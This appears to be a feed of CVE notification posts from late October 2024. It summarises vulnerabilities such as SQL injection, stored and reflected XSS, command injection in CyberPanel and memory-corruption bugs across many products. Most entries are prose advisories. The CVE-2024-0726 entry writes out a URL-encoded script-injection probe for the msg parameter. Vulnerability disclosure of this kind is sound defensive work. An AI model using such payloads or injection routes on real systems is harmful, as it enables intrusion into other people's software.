🚨 CVE-2024-10501A vulnerability, which was classified as critical, was found in ESAFENET CDG 5. This affects the function findById of the file /com/esafenet/servlet/document/ExamCDGDocService.java. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-10-30 01:37:24 |
🚨 CVE-2024-10500A vulnerability, which was classified as critical, has been found in ESAFENET CDG 5. Affected by this issue is some unknown functionality of the file /com/esafenet/servlet/policy/HookWhiteListService.java. The manipulation of the argument policyId leads to sql injection. The attack may be launched remotely. The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-10-30 00:37:25 |
🚨 CVE-2024-51378getresetstatus in dns/views.py and ftp/views.py in CyberPanel (aka Cyber Panel) before 1c0c6cb allows remote attackers to bypass authentication and execute arbitrary commands via /dns/getresetstatus or /ftp/getresetstatus by bypassing secMiddleware (which is only for a POST request) and using shell metacharacters in the statusfile property, as exploited in the wild in October 2024 by PSAUX. Versions through 2.3.6 and (unpatched) 2.3.7 are affected.🎖@cveNotify |
|
| 2024-10-29 23:37:32 |
🚨 CVE-2024-51378getresetstatus in dns/views.py in CyberPanel (aka Cyber Panel) before 1c0c6cb allows remote attackers to bypass authentication and execute arbitrary commands via /ftp/getresetstatus by bypassing secMiddleware (which is only for a POST request) and using shell metacharacters in the statusfile property, as exploited in the wild in October 2024 by PSAUX. Versions through 2.3.6 and (unpatched) 2.3.7 are affected.🎖@cveNotify |
|
| 2024-10-29 23:37:25 |
🚨 CVE-2024-44244A memory corruption issue was addressed with improved input validation. This issue is fixed in iOS 18.1 and iPadOS 18.1, watchOS 11.1, visionOS 2.1, tvOS 18.1, macOS Sequoia 15.1, Safari 18.1. Processing maliciously crafted web content may lead to an unexpected process crash.🎖@cveNotify |
|
| 2024-10-29 23:37:24 |
🚨 CVE-2024-44229An information leakage was addressed with additional validation. This issue is fixed in visionOS 2.1, iOS 18.1 and iPadOS 18.1, macOS Sequoia 15.1, Safari 18.1. Private browsing may leak some browsing history.🎖@cveNotify |
|
| 2024-10-29 22:37:32 |
🚨 CVE-2024-48138A remote code execution (RCE) vulnerability in the component /PluXml/core/admin/parametres_edittpl.php of PluXml v5.8.16 and lower allows attackers to execute arbitrary code via injecting a crafted payload into a template.🎖@cveNotify |
|
| 2024-10-29 22:37:25 |
🚨 CVE-2024-10487Out of bounds write in Dawn in Google Chrome prior to 130.0.6723.92 allowed a remote attacker to perform out of bounds memory access via a crafted HTML page. (Chromium security severity: Critical)🎖@cveNotify |
|
| 2024-10-29 22:37:24 |
🚨 CVE-2024-10228The Vagrant VMWare Utility Windows installer targeted a custom location with a non-protected path that could be modified by an unprivileged user, introducing potential for unauthorized file system writes. This vulnerability, CVE-2024-10228, was fixed in Vagrant VMWare Utility 1.0.23🎖@cveNotify |
|
| 2024-10-29 21:37:32 |
🚨 CVE-2024-25614There is an arbitrary file deletion vulnerability in the CLI used by ArubaOS. Successful exploitation of this vulnerability results in the ability to delete arbitrary files on the underlying operating system, which could lead to denial-of-service conditions and impact the integrity of the controller.🎖@cveNotify |
|
| 2024-10-29 21:37:26 |
🚨 CVE-2024-20030In da, there is a possible information disclosure due to improper input validation. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08541632; Issue ID: ALPS08541741.🎖@cveNotify |
|
| 2024-10-29 21:37:25 |
🚨 CVE-2022-20264In Usage Stats Service, there is a possible way to determine whether an app is installed, without query permissions due to side channel information disclosure. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-10-29 21:37:24 |
🚨 CVE-2022-23397The Cedar Gate EZ-NET portal 6.5.5 6.8.0 Internet portal has a call to display messages to users which does not properly sanitize data sent in through a URL parameter. This leads to a Reflected Cross-Site Scripting vulnerability. NOTE: the vendor disputes this because the ado.im reference has "no clear steps of reproduction."🎖@cveNotify |
|
| 2024-10-29 21:07:32 |
🚨 CVE-2024-10409A vulnerability was found in code-projects Blood Bank Management 1.0 and classified as critical. This issue affects some unknown processing of the file /file/accept.php. The manipulation of the argument reqid leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-10-29 21:07:26 |
🚨 CVE-2024-10407A vulnerability, which was classified as critical, was found in SourceCodester Petrol Pump Management Software 1.0. This affects an unknown part of the file /admin/edit_customer.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-10-29 21:07:25 |
🚨 CVE-2024-48120X2CRM v8.5 is vulnerable to a stored Cross-Site Scripting (XSS) in the "Opportunities" module. An attacker can inject malicious JavaScript code into the "Name" field when creating a list.🎖@cveNotify |
|
| 2024-10-29 21:07:24 |
🚨 CVE-2024-47170Agnai is an artificial-intelligence-agnostic multi-user, mult-bot roleplaying chat system. A vulnerability in versions prior to 1.0.330 permits attackers to read arbitrary JSON files at attacker-chosen locations on the server. This issue can lead to unauthorized access to sensitive information and exposure of confidential configuration files. This only affects installations with `JSON_STORAGE` enabled which is intended to local/self-hosting only. Version 1.0.330 fixes this issue.🎖@cveNotify |
|
| 2024-10-29 20:37:29 |
🚨 CVE-2023-46753An issue was discovered in FRRouting FRR through 9.0.1. A crash can occur for a crafted BGP UPDATE message without mandatory attributes, e.g., one with only an unknown transit attribute.🎖@cveNotify |
|
| 2024-10-29 20:37:26 |
🚨 CVE-2023-37440A vulnerability in the web-based management interface of EdgeConnect SD-WAN Orchestrator could allow an unauthenticated remote attacker to conduct a server-side request forgery (SSRF) attack. A successful exploit allows an attacker to enumerate information about the internal structure of the EdgeConnect SD-WAN Orchestrator host leading to potential disclosure of sensitive information.🎖@cveNotify |
|
| 2024-10-29 20:37:25 |
🚨 CVE-2023-32261A potential vulnerability has been identified in the Micro Focus Dimensions CM Plugin for Jenkins. The vulnerability allows attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins.See the following Jenkins security advisory for details: * https://www.jenkins.io/security/advisory/2023-06-14/ https://www.jenkins.io/security/advisory/2023-06-14/🎖@cveNotify |
|
| 2024-10-29 20:37:24 |
🚨 CVE-2023-23348HCL Launch could disclose sensitive information if a manual edit of a configuration file has been performed.🎖@cveNotify |
|
| 2024-10-29 20:07:30 |
🚨 CVE-2024-4887The Qi Addons For Elementor plugin for WordPress is vulnerable to Remote File Inclusion in all versions up to, and including, 1.7.2 via the 'behavior' attributes found in the qi_addons_for_elementor_blog_list shortcode. This makes it possible for authenticated attackers, with Contributor-level access and above, to include remote files on the server, resulting in code execution. Please note that this requires an attacker to create a non-existent directory or target an instance where file_exists won't return false with a non-existent directory in the path, in order to successfully exploit.🎖@cveNotify |
|
| 2024-10-29 20:07:26 |
🚨 CVE-2024-1988The Post Grid, Form Maker, Popup Maker, WooCommerce Blocks, Post Blocks, Post Carousel – Combo Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'tag' attribute in blocks in all versions up to, and including, 2.2.80 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-10-29 20:07:25 |
🚨 CVE-2023-6876The Clever Fox – One Click Website Importer by Nayra Themes plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'clever-fox-activate-theme' function in all versions up to, and including, 25.2.0. This makes it possible for authenticated attackers, with subscriber access and above, to modify the active theme, including to an invalid value which can take down the site.🎖@cveNotify |
|
| 2024-10-29 19:37:33 |
🚨 CVE-2023-34056vCenter Server contains a partial information disclosure vulnerability. A malicious actor with non-administrative privileges to vCenter Server may leverage this issue to access unauthorized data.🎖@cveNotify |
|
| 2024-10-29 19:07:33 |
🚨 CVE-2024-3987The WP Mobile Menu – The Mobile-Friendly Responsive Menu plugin for WordPress is vulnerable to Stored Cross-Site Scripting via image alt text in all versions up to, and including, 2.8.4.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-10-29 19:07:32 |
🚨 CVE-2024-24198smartdns commit 54b4dc was discovered to contain a misaligned address at smartdns/src/util.c.🎖@cveNotify |
|
| 2024-10-29 18:37:45 |
🚨 CVE-2024-48224Funadmin v5.0.2 has an arbitrary file read vulnerability in /curd/index/editfile.🎖@cveNotify |
|
| 2024-10-29 18:37:40 |
🚨 CVE-2024-48218Funadmin v5.0.2 has a SQL injection vulnerability in /curd/table/list.🎖@cveNotify |
|
| 2024-10-29 18:37:39 |
🚨 CVE-2024-37846MangoOS before 5.2.0 was discovered to contain a Client-Side Template Injection (CSTI) vulnerability via the Platform Management Edit page.🎖@cveNotify |
|
| 2024-10-29 18:37:35 |
🚨 CVE-2024-10276A vulnerability has been found in Telestream Sentry 6.0.9 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /?page=reports of the component Reports Page. The manipulation of the argument z leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-10-29 18:37:34 |
🚨 CVE-2024-25676An issue was discovered in ViewerJS 0.5.8. A script from the component loads content via URL TAGs without properly sanitizing it. This leads to both open redirection and out-of-band resource loading.🎖@cveNotify |
|
| 2024-10-29 18:37:29 |
🚨 CVE-2023-35680In multiple locations, there is a possible way to import contacts belonging to other users due to a confused deputy. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-10-29 18:37:28 |
🚨 CVE-2023-3329SpiderControl SCADA Webserver versions 2.08 and prior are vulnerable to path traversal. An attacker with administrative privileges could overwrite files on the webserver using the HMI's upload file feature. This could create size zero files anywhere on the webserver, potentially overwriting system files and creating a denial-of-service condition.🎖@cveNotify |
|
| 2024-10-29 18:07:40 |
🚨 CVE-2024-49978In the Linux kernel, the following vulnerability has been resolved:gso: fix udp gso fraglist segmentation after pull from frag_listDetect gso fraglist skbs with corrupted geometry (see below) andpass these to skb_segment instead of skb_segment_list, as the firstcan segment them correctly.Valid SKB_GSO_FRAGLIST skbs- consist of two or more segments- the head_skb holds the protocol headers plus first gso_size- one or more frag_list skbs hold exactly one segment- all but the last must be gso_sizeOptional datapath hooks such as NAT and BPF (bpf_skb_pull_data) canmodify these skbs, breaking these invariants.In extreme cases they pull all data into skb linear. For UDP, thiscauses a NULL ptr deref in __udpv4_gso_segment_list_csum atudp_hdr(seg->next)->dest.Detect invalid geometry due to pull, by checking head_skb size.Don't just drop, as this may blackhole a destination. Convert to beable to pass to regular skb_segment.🎖@cveNotify |
|
| 2024-10-29 18:07:34 |
🚨 CVE-2024-42508This vulnerability could be exploited, leading to unauthorized disclosure of information to authenticated users.🎖@cveNotify |
|
| 2024-10-29 18:07:33 |
🚨 CVE-2024-5612The Essential Addons for Elementor Pro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘eael_lightbox_open_btn_icon’ parameter within the Lightbox & Modal widget in all versions up to, and including, 5.8.15 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-10-29 18:07:32 |
🚨 CVE-2024-4902The Tutor LMS – eLearning and online course solution plugin for WordPress is vulnerable to time-based SQL Injection via the ‘course_id’ parameter in all versions up to, and including, 2.7.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with admin access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.🎖@cveNotify |
|
| 2024-10-29 17:37:37 |
🚨 CVE-2024-50577In JetBrains YouTrack before 2024.3.47707 stored XSS was possible via Angular template injection in Hub settings🎖@cveNotify |
|
| 2024-10-29 17:37:31 |
🚨 CVE-2024-50576In JetBrains YouTrack before 2024.3.47707 stored XSS was possible via vendor URL in App manifest🎖@cveNotify |
|
| 2024-10-29 17:37:30 |
🚨 CVE-2024-50573In JetBrains Hub before 2024.3.47707 improper access control allowed users to generate permanent tokens for unauthorized services🎖@cveNotify |
|
| 2024-10-29 17:37:29 |
🚨 CVE-2024-41618Money Manager EX WebApp (web-money-manager-ex) 1.2.2 is vulnerable to SQL Injection in the `transaction_delete_group` function. The vulnerability is due to improper sanitization of user input in the `TrDeleteArr` parameter, which is directly incorporated into an SQL query.🎖@cveNotify |
|
| 2024-10-29 17:37:26 |
🚨 CVE-2024-41617Money Manager EX WebApp (web-money-manager-ex) 1.2.2 is vulnerable to Incorrect Access Control. The `redirect_if_not_loggedin` function in `functions_security.php` fails to terminate script execution after redirecting unauthenticated users. This flaw allows an unauthenticated attacker to upload arbitrary files, potentially leading to Remote Code Execution.🎖@cveNotify |
|
| 2024-10-29 17:37:25 |
🚨 CVE-2024-2402The Better Comments WordPress plugin before 1.5.6 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2024-10-29 17:37:24 |
🚨 CVE-2023-7047Inadequate validation of permissions when employing remote tools and macros via the context menu within Devolutions Remote Desktop Manager versions 2023.3.31 and earlier permits a user to initiate a connection without proper execution rights via the remote tools feature. This affects only SQL data sources.🎖@cveNotify |
|
| 2024-10-29 17:07:25 |
🚨 CVE-2024-10014The Flat UI Button plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's flatbtn shortcode in version 1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-10-29 17:07:24 |
🚨 CVE-2024-49288Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in VillaTheme Email Template Customizer for WooCommerce allows Stored XSS.This issue affects Email Template Customizer for WooCommerce: from n/a through 1.2.5.🎖@cveNotify |
|
| 2024-10-29 16:38:10 |
🚨 CVE-2023-25945Protection mechanism failure in some Intel(R) OFU software before version 14.1.31 may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2024-10-29 16:38:03 |
🚨 CVE-2023-24591Uncontrolled search path in some Intel(R) Binary Configuration Tool software before version 3.4.4 may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2024-10-29 16:38:02 |
🚨 CVE-2022-4917Incorrect security UI in Notifications in Google Chrome on Android prior to 103.0.5060.53 allowed a remote attacker to obscure the full screen notification via a crafted HTML page. (Chromium security severity: Low)🎖@cveNotify |
|
| 2024-10-29 16:38:01 |
🚨 CVE-2023-31998A heap overflow vulnerability found in EdgeRouters and Aircubes allows a malicious actor to interrupt UPnP service to said devices.🎖@cveNotify |
|
| 2024-10-29 16:37:57 |
🚨 CVE-2022-36802The ManageJiraConnectors API in Atlassian Jira Align before version 10.109.2 allows remote attackers to exploit this issue to access internal network resources via a Server-Side Request Forgery. This can be exploited by a remote, unauthenticated attacker with Super Admin privileges by sending a specially crafted HTTP request.🎖@cveNotify |
|
| 2024-10-29 16:37:56 |
🚨 CVE-2022-26135A vulnerability in Mobile Plugin for Jira Data Center and Server allows a remote, authenticated user (including a user who joined via the sign-up feature) to perform a full read server-side request forgery via a batch endpoint. This affects Atlassian Jira Server and Data Center from version 8.0.0 before version 8.13.22, from version 8.14.0 before 8.20.10, from version 8.21.0 before 8.22.4. This also affects Jira Management Server and Data Center versions from version 4.0.0 before 4.13.22, from version 4.14.0 before 4.20.10 and from version 4.21.0 before 4.22.4.🎖@cveNotify |
|
| 2024-10-29 16:07:33 |
🚨 CVE-2023-32651Improper validation of specified type of input for some Intel(R) PROSet/Wireless and Intel(R) Killer(TM) Wi-Fi software before version 22.240 may allow an unauthenticated user to potentially enable denial of service via adjacent access.🎖@cveNotify |
|
| 2024-10-29 16:07:26 |
🚨 CVE-2023-32642Insufficient adherence to expected conventions for some Intel(R) PROSet/Wireless and Intel(R) Killer(TM) Wi-Fi software before version 22.240 may allow an unauthenticated user to potentially enable denial of service via adjacent access.🎖@cveNotify |
|
| 2024-10-29 16:07:25 |
🚨 CVE-2023-26586Uncaught exception for some Intel(R) PROSet/Wireless and Intel(R) Killer(TM) Wi-Fi software before version 22.240 may allow an unauthenticated user to potentially enable denial of service via adjacent access.🎖@cveNotify |
|
| 2024-10-29 16:07:24 |
🚨 CVE-2023-25951Improper input validation for some Intel(R) PROSet/Wireless and Intel(R) Killer(TM) Wi-Fi software before version 22.240 may allow a privileged user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2024-10-29 15:38:08 |
🚨 CVE-2024-34950D-Link DIR-822+ v1.0.5 was discovered to contain a stack-based buffer overflow vulnerability in the SetNetworkTomographySettings module.🎖@cveNotify |
|
| 2024-10-29 15:07:27 |
🚨 CVE-2024-8916The Suki Sites Import plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.2.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.🎖@cveNotify |
|
| 2024-10-29 15:07:26 |
🚨 CVE-2024-10049The Edit WooCommerce Templates plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘page’ parameter in all versions up to, and including, 1.1.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-10-29 15:07:25 |
🚨 CVE-2023-37822The Eufy Homebase 2 before firmware version 3.3.4.1h creates a dedicated wireless network for its ecosystem, which serves as a proxy to the end user's primary network. The WPA2-PSK generation of this dedicated network is flawed and solely based on the serial number. Due to the flawed generation process, the WPA2-PSK can be brute forced offline within seconds. This vulnerability allows an attacker in proximity to the dedicated wireless network to gain unauthorized access to the end user's primary network. The only requirement of the attack is proximity to the dedicated wireless network.🎖@cveNotify |
|
| 2024-10-29 14:07:33 |
🚨 CVE-2023-52123Cross-Site Request Forgery (CSRF) vulnerability in WPChill Strong Testimonials.This issue affects Strong Testimonials: from n/a through 3.1.10.🎖@cveNotify |
|
| 2024-10-29 14:07:32 |
🚨 CVE-2020-8549Stored XSS in the Strong Testimonials plugin before 2.40.1 for WordPress can result in an attacker performing malicious actions such as stealing session tokens.🎖@cveNotify |
|
| 2024-10-29 13:37:33 |
🚨 CVE-2024-10425A vulnerability was found in Project Worlds Student Project Allocation System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /student/project_selection/move_up_project.php of the component Project Selection Page. The manipulation of the argument up leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-10-29 13:37:32 |
🚨 CVE-2024-0726A vulnerability was found in Project Worlds Student Project Allocation System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file admin_login.php of the component Admin Login Module. The manipulation of the argument msg with the input test%22%3Cscript%3Ealert(%27Torada%27)%3C/script%3E leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251549 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-10-29 12:37:32 |
🚨 CVE-2024-49650Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in xarbo BuddyPress Greeting Message allows Reflected XSS.This issue affects BuddyPress Greeting Message: from n/a through 1.0.3.🎖@cveNotify |
|
| 2024-10-29 12:37:26 |
🚨 CVE-2024-49648Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in rafasashi SVG Captcha allows Reflected XSS.This issue affects SVG Captcha: from n/a through 1.0.11.🎖@cveNotify |
|
| 2024-10-29 12:37:25 |
🚨 CVE-2024-10181The Newsletters plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's newsletters_video shortcode in all versions up to, and including, 4.9.9.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-10-29 12:37:24 |
🚨 CVE-2017-20195A vulnerability was found in LUNAD3v AreaLoad up to 1a1103182ed63a06dde63d1712f3262eda19c3ec. It has been rated as critical. This issue affects some unknown processing of the file request.php. The manipulation of the argument phone leads to sql injection. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The patch is named 264813c546dba03989ac0fc365f2022bf65e3be2. It is recommended to apply a patch to fix this issue.🎖@cveNotify |
|
| 2024-10-29 11:37:32 |
🚨 CVE-2024-49670Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Sam Glover Client Power Tools Portal allows Reflected XSS.This issue affects Client Power Tools Portal: from n/a through 1.8.6.🎖@cveNotify |
|
| 2024-10-29 11:37:26 |
🚨 CVE-2024-10360The Move Addons for Elementor plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.3.5 via the render function in includes/widgets/accordion/widget.php, includes/widgets/remote-template/widget.php, and other widget.php files. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, and draft template data.🎖@cveNotify |
|
| 2024-10-29 11:37:25 |
🚨 CVE-2024-10185The StreamWeasels YouTube Integration plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's sw-youtube-embed shortcode in all versions up to, and including, 1.3.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-10-29 11:37:24 |
🚨 CVE-2024-10184The StreamWeasels Kick Integration plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's sw-kick-embed shortcode in all versions up to, and including, 1.1.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-10-29 10:37:34 |
🚨 CVE-2024-9376The Kata Plus – Addons for Elementor – Widgets, Extensions and Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.4.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.🎖@cveNotify |
|
| 2024-10-29 10:37:33 |
🚨 CVE-2024-10227The affiliate-toolkit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's atkp_product shortcode in all versions up to, and including, 3.6.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-10-29 09:37:25 |
🚨 CVE-2024-22066There is a privilege escalation vulnerability in ZTE ZXR10 ZSR V2 intelligent multi service router . An authenticated attacker could use the vulnerability to obtain sensitive information about the device.🎖@cveNotify |
|
| 2024-10-29 09:37:24 |
🚨 CVE-2024-10048The Post Status Notifier Lite and Premium plugins for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘page’ parameter in all versions up to, and including, 1.11.6 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-10-29 08:37:24 |
🚨 CVE-2024-37672Cross Site Scripting vulnerability in Tessi Docubase Document Management product 5.x allows a remote attacker to execute arbitrary code via the idactivity parameter.🎖@cveNotify |
|
| 2024-10-29 06:37:25 |
🚨 CVE-2024-10008The Masteriyo LMS – eLearning and Online Course Builder for WordPress plugin for WordPress is vulnerable to unauthorized user profile modification due to missing authorization checks on the /wp-json/masteriyo/v1/users/$id REST API endpoint in all versions up to, and including, 1.13.3. This makes it possible for authenticated attackers, with student-level access and above, to modify the roles of arbitrary users. As a result, attackers can escalate their privileges to the Administrator and demote existing administrators to students.🎖@cveNotify |
|
| 2024-10-29 06:37:24 |
🚨 CVE-2024-10000The Masteriyo LMS – eLearning and Online Course Builder for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the question's content parameter in all versions up to, and including, 1.13.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with student-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-10-29 01:37:53 |
🚨 CVE-2024-10477A vulnerability classified as problematic was found in LinZhaoguan pb-cms up to 2.0.1. This vulnerability affects unknown code of the file /admin#permissions of the component Permission Management Page. The manipulation leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-10-29 01:07:37 |
🚨 CVE-2024-10418A vulnerability was found in code-projects Blood Bank Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /file/infoAdd.php. The manipulation of the argument bg leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-10-29 00:38:12 |
🚨 CVE-2024-10421A vulnerability classified as critical was found in SourceCodester Attendance and Payroll System 1.0. This vulnerability affects unknown code of the file /admin/overtime_row.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-10-29 00:38:11 |
🚨 CVE-2024-10419A vulnerability was found in code-projects Blood Bank Management System 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /bloodrequest.php. The manipulation of the argument msg leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-10-28 23:37:25 |
🚨 CVE-2024-51508Tiki through 27.0 allows users who have certain permissions to insert a "Create/Edit External Wiki" stored XSS payload in the Index.🎖@cveNotify |
|
| 2024-10-28 23:37:24 |
🚨 CVE-2024-51506Tiki through 27.0 allows users who have certain permissions to insert a "Create a Wiki Pages" stored XSS payload in the description.🎖@cveNotify |
|
| 2024-10-28 22:37:32 |
🚨 CVE-2024-44240The issue was addressed with improved checks. This issue is fixed in tvOS 18.1, iOS 18.1 and iPadOS 18.1, iOS 17.7.1 and iPadOS 17.7.1, macOS Ventura 13.7.1, macOS Sonoma 14.7.1, watchOS 11.1, visionOS 2.1. Processing a maliciously crafted font may result in the disclosure of process memory.🎖@cveNotify |
|
| 2024-10-28 22:37:25 |
🚨 CVE-2024-44145This issue was addressed through improved state management. This issue is fixed in macOS Sequoia 15, iOS 18 and iPadOS 18. An attacker with physical access to a macOS device with Sidecar enabled may be able to bypass the Lock Screen.🎖@cveNotify |
|
| 2024-10-28 22:37:24 |
🚨 CVE-2024-30106HCL Connections is vulnerable to an information disclosure vulnerability, due to an IBM WebSphere Application Server error, which could allow a user to obtain sensitive information they are not entitled to due to the improper handling of request data.🎖@cveNotify |
|
| 2024-10-28 20:37:32 |
🚨 CVE-2022-23091A particular case of memory sharing is mishandled in the virtual memory system. This is very similar to SA-21:08.vm, but with a different root cause.An unprivileged local user process can maintain a mapping of a page after it is freed, allowing that process to read private data belonging to other processes or the kernel.🎖@cveNotify |
|
| 2024-10-28 20:37:26 |
🚨 CVE-2023-47455Tenda AX1806 V1.0.0.1 contains a heap overflow vulnerability in setSchedWifi function, in which the src and v12 are directly obtained from http request parameter schedStartTime and schedEndTime without checking their size.🎖@cveNotify |
|
| 2024-10-28 20:37:25 |
🚨 CVE-2023-26130Versions of the package yhirose/cpp-httplib before 0.12.4 are vulnerable to CRLF Injection when untrusted user input is used to set the content-type header in the HTTP .Patch, .Post, .Put and .Delete requests. This can lead to logical errors and other misbehaviors.**Note:** This issue is present due to an incomplete fix for [CVE-2020-11709](https://security.snyk.io/vuln/SNYK-UNMANAGED-YHIROSECPPHTTPLIB-2366507).🎖@cveNotify |
|
| 2024-10-28 20:37:24 |
🚨 CVE-2022-26580PAX A930 device with PayDroid_7.1.1_Virgo_V04.3.26T1_20210419 can allow the execution of specific command injections on selected binaries in the ADB daemon shell service. The attacker must have physical USB access to the device in order to exploit this vulnerability.🎖@cveNotify |
|
| 2024-10-28 19:37:43 |
🚨 CVE-2023-50811An issue discovered in SELESTA Visual Access Manager 4.38.6 allows attackers to modify the “computer” POST parameter related to the ID of a specific reception by POST HTTP request interception. Iterating that parameter, it has been possible to access to the application and take control of many other receptions in addition the assigned one.🎖@cveNotify |
|
| 2024-10-28 19:37:37 |
🚨 CVE-2024-28394An issue in Advanced Plugins reportsstatistics v1.3.20 and before allows a remote attacker to execute arbitrary code via the Sales Reports, Statistics, Custom Fields & Export module.🎖@cveNotify |
|
| 2024-10-28 19:37:36 |
🚨 CVE-2022-23093ping reads raw IP packets from the network to process responses in the pr_pack() function. As part of processing a response ping has to reconstruct the IP header, the ICMP header and if present a "quoted packet," which represents the packet that generated an ICMP error. The quoted packet again has an IP header and an ICMP header.The pr_pack() copies received IP and ICMP headers into stack buffers for further processing. In so doing, it fails to take into account the possible presence of IP option headers following the IP header in either the response or the quoted packet. When IP options are present, pr_pack() overflows the destination buffer by up to 40 bytes.The memory safety bugs described above can be triggered by a remote host, causing the ping program to crash.The ping process runs in a capability mode sandbox on all affected versions of FreeBSD and is thus very constrained in how it can interact with the rest of the system at the point where the bug can occur.🎖@cveNotify |
|
| 2024-10-28 19:37:35 |
🚨 CVE-2023-35836An issue was discovered in SolaX Pocket WiFi 3 through 3.001.02. An attacker within RF range can obtain a cleartext copy of the network configuration of the device, including the Wi-Fi PSK, during device setup and reconfiguration. Upon success, the attacker is able to further infiltrate the target's Wi-Fi networks.🎖@cveNotify |
|
| 2024-10-28 19:37:32 |
